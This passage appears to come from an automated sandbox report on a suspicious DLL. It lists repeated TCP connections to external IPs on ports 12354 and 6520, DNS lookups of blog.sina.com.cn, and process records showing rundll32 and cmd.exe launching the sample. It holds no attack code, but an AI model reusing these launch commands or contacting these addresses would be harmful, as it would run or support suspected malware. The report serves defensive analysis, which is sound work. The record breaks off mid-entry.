                                    Nov 19, 2024 14:25:24.013674021 CET4981212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:24.013675928 CET4981380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:24.326179981 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:25.826472044 CET4981112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.013659000 CET4981212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.013695955 CET4981380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:26.733376980 CET4981412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.849895000 CET4981512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:26.851104021 CET4981680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:27.827009916 CET4981412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:28.014064074 CET4981512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:28.019062042 CET4981680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:29.827105999 CET4981412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.123100996 CET4981512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.127074003 CET4981680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:30.749066114 CET4981812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.936288118 CET4981912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:30.951965094 CET4982080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:31.901240110 CET4981812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:32.013701916 CET4982080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:32.013801098 CET4981912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:32.327092886 CET498066520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:33.947594881 CET4981812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.013669968 CET4982080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:34.056339979 CET4981912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.764420033 CET4982112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.889923096 CET4982212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:34.891557932 CET4982380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:35.810610056 CET4982112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:35.977252960 CET4982212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:36.013722897 CET4982380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:37.810601950 CET4982112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:37.998517036 CET4982212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:38.015193939 CET4982380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:38.437176943 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:38.920519114 CET4982512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:38.972784996 CET4982680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:38.973191023 CET4982712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:39.513700008 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:40.013745070 CET4982512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:40.013746023 CET4982680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:40.014017105 CET4982712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:41.529357910 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:42.013711929 CET4982512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:42.013711929 CET4982712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:42.013729095 CET4982680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:42.936799049 CET4982812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:43.052885056 CET4982912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:43.054179907 CET4983080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:44.011044025 CET4982812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:44.138705015 CET4983080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:44.201215982 CET4982912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:45.623193026 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:46.107491016 CET4982812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:46.310622931 CET4982912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:46.326256990 CET4983080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:46.952352047 CET4983112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:47.171063900 CET4983280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:47.171258926 CET4983312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:47.998117924 CET4983112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:48.253576994 CET4983280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:48.326225042 CET4983312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:50.107494116 CET4983112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:50.310659885 CET4983280192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:50.326404095 CET4983312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:50.967982054 CET4983412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:51.081588984 CET4983512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:51.082614899 CET4983680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:52.013736010 CET4983412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:52.123116970 CET4983512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:52.201275110 CET4983680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:53.623137951 CET498246520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:25:54.013752937 CET4983412354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:54.123142004 CET4983512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:54.310648918 CET4983680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:54.984277964 CET4983812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:55.235299110 CET4983912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:55.781266928 CET4984080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:56.013926983 CET4983812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:56.326260090 CET4983912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:56.826364040 CET4984080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:58.013998032 CET4983812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:58.326275110 CET4983912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:58.826313972 CET4984080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:58.999727011 CET4984112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:59.183645964 CET4984212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:25:59.185987949 CET4984380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:25:59.734745026 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:00.107600927 CET4984112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:00.271472931 CET4984212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:00.326303005 CET4984380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:00.826343060 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:02.193212986 CET4984112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:02.310671091 CET4984212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:02.326704025 CET4984380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:02.826308012 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:03.020301104 CET4984512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:03.130287886 CET4984612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:03.130894899 CET4984780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:04.013784885 CET4984512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:04.201312065 CET4984612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:04.326307058 CET4984780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:06.013952971 CET4984512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:06.201286077 CET4984612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:06.327136993 CET4984780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:06.826878071 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:07.306355000 CET4984812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:07.306818962 CET4984912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:07.330537081 CET4985080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:08.326307058 CET4984912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:08.326370001 CET4984812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:08.509690046 CET4985080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:10.326304913 CET4984912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:10.326370001 CET4984812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:10.607609034 CET4985080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:11.311594009 CET4985112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:11.424372911 CET4985212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:11.425437927 CET4985380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:12.326384068 CET4985112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:12.449712992 CET4985380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:12.513812065 CET4985212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:14.326308966 CET4985112354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:14.515177011 CET4985212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:14.607755899 CET4985380192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:14.826314926 CET498446520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:15.330224037 CET4985512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:15.530678988 CET4985612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:15.530740023 CET4985780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:16.513856888 CET4985512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:16.590523005 CET4985780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:16.623325109 CET4985612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:18.514064074 CET4985512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:18.623262882 CET4985612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:18.645919085 CET4985780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:19.330279112 CET4985812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:19.441782951 CET4985912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:19.442440987 CET4986080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:20.513856888 CET4985912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:20.515156984 CET4985812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:20.607600927 CET4986080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:20.946676970 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:21.998310089 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:22.524121046 CET4985912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:22.524156094 CET4985812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:22.607608080 CET4986080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:23.342793941 CET4986212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:23.540503979 CET4986312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:23.580389977 CET4986480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:24.013904095 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:24.513859987 CET4986212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:24.623307943 CET4986312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:24.623310089 CET4986480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:26.513900042 CET4986212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:26.623243093 CET4986312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:26.627239943 CET4986480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:27.361130953 CET4986512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:27.476914883 CET4986612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:27.478612900 CET4986780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:28.013916969 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:28.513874054 CET4986512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:28.513875008 CET4986780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:28.514127970 CET4986612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:30.513968945 CET4986512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:30.513969898 CET4986780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:30.514030933 CET4986612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:31.574285030 CET4986912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:31.575514078 CET4987080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:31.575692892 CET4986812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:32.623689890 CET4987080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:32.679872990 CET4986912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:32.679876089 CET4986812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:34.623238087 CET4987080192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:34.701411963 CET4986912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:34.701464891 CET4986812354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:35.577670097 CET4987212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:35.692183018 CET4987312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:35.693097115 CET4987480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:36.013899088 CET498616520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:36.628499031 CET4987212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:36.810834885 CET4987480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:36.827510118 CET4987312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:38.810777903 CET4987480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:38.826387882 CET4987212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:39.013997078 CET4987312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:39.593848944 CET4987512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:39.759171009 CET4987680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:39.788111925 CET4987712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:40.623330116 CET4987512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:40.826781988 CET4987712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:40.904541016 CET4987680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:42.242604017 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:42.623280048 CET4987512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:42.826445103 CET4987712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:42.984397888 CET4987680192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:43.310796976 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:44.157605886 CET4987912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:44.186698914 CET4988012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:44.187304020 CET4988180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:45.310898066 CET4988012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:45.313254118 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:45.326477051 CET4987912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:45.326643944 CET4988180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:47.326431990 CET4987912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:47.326455116 CET4988180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:47.391455889 CET4988012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:48.171858072 CET4988212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:48.283902884 CET4988312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:48.284909010 CET4988480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:49.201543093 CET4988212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:49.310791016 CET4988312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:49.310808897 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:49.326417923 CET4988480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:51.288141012 CET4988212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:51.326416969 CET4988480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:51.397835016 CET4988312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:52.210390091 CET4988512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:52.317163944 CET4988612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:52.317763090 CET4988780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:53.310836077 CET4988512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:53.326438904 CET4988780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:53.498387098 CET4988612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:55.310836077 CET4988512354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:55.326466084 CET4988780192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:55.513948917 CET4988612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:56.218348026 CET4988912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:56.355493069 CET4989012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:56.729166031 CET4989180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:57.310892105 CET4988912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:57.313441038 CET498786520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:26:57.450083971 CET4989012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:57.810874939 CET4989180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:26:59.310976028 CET4988912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:59.498353958 CET4989012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:26:59.826452971 CET4989180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:00.238456964 CET4989212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:00.476861000 CET4989312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:00.477161884 CET4989480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:01.275685072 CET4989212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:01.498356104 CET4989312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:01.514012098 CET4989480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:03.310951948 CET4989212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:03.422241926 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:03.498512030 CET4989312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:03.514014959 CET4989480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:04.289127111 CET4989612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:04.393584013 CET4989712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:04.411619902 CET4989880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:04.420202971 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:05.310898066 CET4989612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:05.420259953 CET4989712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:05.483367920 CET4989880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:06.518098116 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:07.313317060 CET4989612354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:07.498363972 CET4989880192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:07.623383999 CET4989712354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:08.608614922 CET4989912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:08.608794928 CET4990012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:08.609110117 CET4990180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:09.631351948 CET4989912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:09.631429911 CET4990012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:09.701478958 CET4990180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:10.623488903 CET498956520192.168.2.10107.163.241.193
                                    Nov 19, 2024 14:27:11.701674938 CET4990180192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:11.810897112 CET4989912354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:11.811297894 CET4990012354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:12.624401093 CET4990212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:12.742626905 CET4990312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:12.745316029 CET4990480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:13.623603106 CET4990212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:13.811434984 CET4990480192.168.2.10202.108.0.52
                                    Nov 19, 2024 14:27:13.811438084 CET4990312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:15.623408079 CET4990212354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:15.810926914 CET4990312354192.168.2.10107.163.241.186
                                    Nov 19, 2024 14:27:15.810940027 CET4990480192.168.2.10202.108.0.52

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Nov 19, 2024 14:23:37.276221037 CET5526853192.168.2.101.1.1.1
                                    Nov 19, 2024 14:23:37.283813000 CET53552681.1.1.1192.168.2.10
                                    Nov 19, 2024 14:23:54.335678101 CET4967253192.168.2.101.1.1.1
                                    Nov 19, 2024 14:23:54.655605078 CET53496721.1.1.1192.168.2.10
                                    Nov 19, 2024 14:24:54.973100901 CET6048653192.168.2.101.1.1.1
                                    Nov 19, 2024 14:24:55.349698067 CET53604861.1.1.1192.168.2.10
                                    Nov 19, 2024 14:25:55.236169100 CET5794153192.168.2.101.1.1.1
                                    Nov 19, 2024 14:25:55.780548096 CET53579411.1.1.1192.168.2.10
                                    Nov 19, 2024 14:26:56.358879089 CET5040053192.168.2.101.1.1.1
                                    Nov 19, 2024 14:26:56.728183985 CET53504001.1.1.1192.168.2.10

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    Nov 19, 2024 14:23:37.276221037 CET192.168.2.101.1.1.10xddf0Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:23:54.335678101 CET192.168.2.101.1.1.10x7018Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:24:54.973100901 CET192.168.2.101.1.1.10x8cbeStandard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:25:55.236169100 CET192.168.2.101.1.1.10xa670Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:26:56.358879089 CET192.168.2.101.1.1.10xe8c3Standard query (0)blog.sina.com.cnA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    Nov 19, 2024 14:23:37.283813000 CET1.1.1.1192.168.2.100xddf0No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                    Nov 19, 2024 14:23:37.283813000 CET1.1.1.1192.168.2.100xddf0No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:23:54.655605078 CET1.1.1.1192.168.2.100x7018No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                    Nov 19, 2024 14:23:54.655605078 CET1.1.1.1192.168.2.100x7018No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:24:55.349698067 CET1.1.1.1192.168.2.100x8cbeNo error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                    Nov 19, 2024 14:24:55.349698067 CET1.1.1.1192.168.2.100x8cbeNo error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:25:55.780548096 CET1.1.1.1192.168.2.100xa670No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                    Nov 19, 2024 14:25:55.780548096 CET1.1.1.1192.168.2.100xa670No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false
                                    Nov 19, 2024 14:26:56.728183985 CET1.1.1.1192.168.2.100xe8c3No error (0)blog.sina.com.cnblogx.sina.com.cnCNAME (Canonical name)IN (0x0001)false
                                    Nov 19, 2024 14:26:56.728183985 CET1.1.1.1192.168.2.100xe8c3No error (0)blogx.sina.com.cn202.108.0.52A (IP address)IN (0x0001)false

                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\loaddll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:loaddll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll"
                                    Imagebase:0xf50000
                                    File size:126'464 bytes
                                    MD5 hash:51E6071F9CBA48E79F10C84515AAE618
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:1
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff620390000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:2
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\NaRZIOq3O8.dll",#1
                                    Imagebase:0xd70000
                                    File size:236'544 bytes
                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:rundll32.exe C:\Users\user\Desktop\NaRZIOq3O8.dll,Group
                                    Imagebase:0x590000
                                    File size:61'440 bytes
                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    General

                                    Target ID:4
                                    Start time:08:23:05
                                    Start date:19/11/2024
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
